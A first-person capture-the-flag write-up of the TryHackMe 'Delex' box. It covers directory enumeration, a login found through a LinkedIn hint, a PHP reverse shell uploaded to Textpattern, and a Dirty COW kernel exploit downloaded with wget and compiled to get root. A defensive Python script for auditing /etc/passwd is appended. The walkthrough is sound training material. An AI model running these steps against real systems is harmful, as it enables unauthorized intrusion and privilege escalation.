Delex(Tryhackme) — Write Up
This is my first write-up; please read it and comment any improvement-related queries in the comment box.
Delex is a private TryHackMe machine created by Ehackify Cybersecurity Research Center. It is a beginner-level web application box focused on basic reconnaissance, CMS and kernel exploitation phases.
Table of contents
Scanning
Nmap
Enumeration
Gobuster
Exploitation
PHP Reverse Shell and Netcat
Privilege Escalation
Dirty COW (Kernel Exploit)
Scanning
(In this phase I want to do OS discovery, find open ports and the services on them, and also run the vulnerability scripts.)
For scanning I chose Nmap. Nmap is available by default on Debian-based systems, and downloads are also available for Windows and macOS.
In my port scan I found that port 80 was open, so I moved on to that and opened it in the browser.
At the same time, in another terminal, I ran the gobuster tool for directory discovery.
sudo gobuster dir -u <IP> -w /usr/share/wordlists/dirb/common.txt
I found something interesting: robots.txt, and from there I got the /textpattern/textpattern directory. So I moved on to it.
Oh... damn it! There is some security stuff here... Where do I get it? Hmm, is there anything on the index page? Let's check it!
Yeah... I got an interesting username from here. But where is the password? Oh yeah, let's try some common ones... Oh no, it's not working! Anything more on this page? Yes! I found something external related to this user: a LinkedIn profile link.
Observe it carefully; there is a post related to this machine. It has a highlighted word, "lionheart".
Then move to the /textpattern/textpattern page and enter the credentials there!
User Name: mayer
Password: lionheart
Wooow! Jubilant! I got access to it!
Wait! Wait! There is a weakness here... Hmm! We have an opportunity to upload a PHP page, so let's try to upload a reverseshell.php file.
I got the PHP reverse shell from here, "https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php", saved it on my system as reverse.php, and edited it with my own listener details (tun0 IP address and port number). Finally, I uploaded it to Textpattern.
We successfully uploaded it. Then we want a reverse connection from it. For that we open the uploaded file in our web browser while running a Netcat listener in our terminal.
Yeah! We got the reverse connection!
It's just a reverse connection; we want more than that! First of all we want an interactive shell on the target machine. For that we run a Python one-liner:
python -c 'import pty; pty.spawn("/bin/sh")'
Then move to the user flag! Yeah, got it!
Oh no! It's only a user; we want more privilege to get the root flag...
For that we want to check the kernel version, so enter "uname -r": it's "3.2.0-4-amd64". Move to Exploit-DB to find a vulnerability for this version; it is vulnerable to Dirty COW, using the pokemon exploit. Save it on my system.
The next step is the most important! We want to upload this file to our target machine; for that we start a Python HTTP server from the directory where the file is stored.
python -m http.server <PORT>
Next, download it from the target machine; for this we use the wget command.
wget -m http://<tun0_IP>:<PORT>/<File_name>
It's a C file and we want to run it on our target system; for this we compile it with this command.
gcc -pthread 40839.c -o dirty -lcrypt
This compiles the C file into an executable binary; then we make it executable using chmod.
chmod +x dirty
After that, execute the file.
./dirty
This exploit creates a new user named firefart; we set a custom password for it, and a backup of the original passwd file is kept at /tmp/passwd.bak.
Then exit from the current shell, regain access, and switch to the new user firefart, entering the customised password.
su firefart
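From the defender's side, the artefacts this step leaves behind are easy to check for: an extra UID-0 account and a password hash sitting in /etc/passwd instead of /etc/shadow. The following audit script is an added example, not part of the original write-up; the passwd contents and the hash value are constructed samples, and the backup comparison assumes a copy like /tmp/passwd.bak is available.

```python
from collections import namedtuple

# One line of /etc/passwd: name:passwd:uid:gid:gecos:home:shell
PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

def parse_passwd(text):
    """Parse passwd-format text; malformed lines are skipped rather than trusted."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries

def rogue_uid0(entries):
    """Any account other than root with UID 0 is a privileged backdoor."""
    return sorted(e.name for e in entries if e.uid == 0 and e.name != "root")

def inline_hashes(entries):
    """Hashes belong in /etc/shadow; a hash in field 2 means passwd was rewritten."""
    return sorted(e.name for e in entries if e.passwd not in ("x", "*", "!", ""))

def diff_passwd(current, backup):
    """Compare the live file against a backup copy (e.g. /tmp/passwd.bak)."""
    cur = {e.name: e for e in current}
    bak = {e.name: e for e in backup}
    added = sorted(set(cur) - set(bak))
    removed = sorted(set(bak) - set(cur))
    changed = sorted(n for n in cur.keys() & bak.keys() if cur[n] != bak[n])
    return added, removed, changed

def audit(current_text, backup_text):
    cur, bak = parse_passwd(current_text), parse_passwd(backup_text)
    added, removed, changed = diff_passwd(cur, bak)
    return {"rogue_uid0": rogue_uid0(cur), "inline_hashes": inline_hashes(cur),
            "added": added, "removed": removed, "changed": changed}

# Constructed sample data for the demo; not taken from any real machine.
BACKUP = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mayer:x:1000:1000:mayer,,,:/home/mayer:/bin/bash
"""
# Constructed "after" state: a UID-0 account with an inline (fake) hash.
CURRENT = BACKUP + "firefart:$6$saltsalt$FAKEHASHFORDEMOONLY:0:0:pwned:/root:/bin/bash\n"

if __name__ == "__main__":
    print(audit(CURRENT, BACKUP))
```

On a live host, feed it the contents of /etc/passwd and the backup file; an empty result for every key is the expected clean state.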
Got root!
It's pwned!
Finally, take the root flag.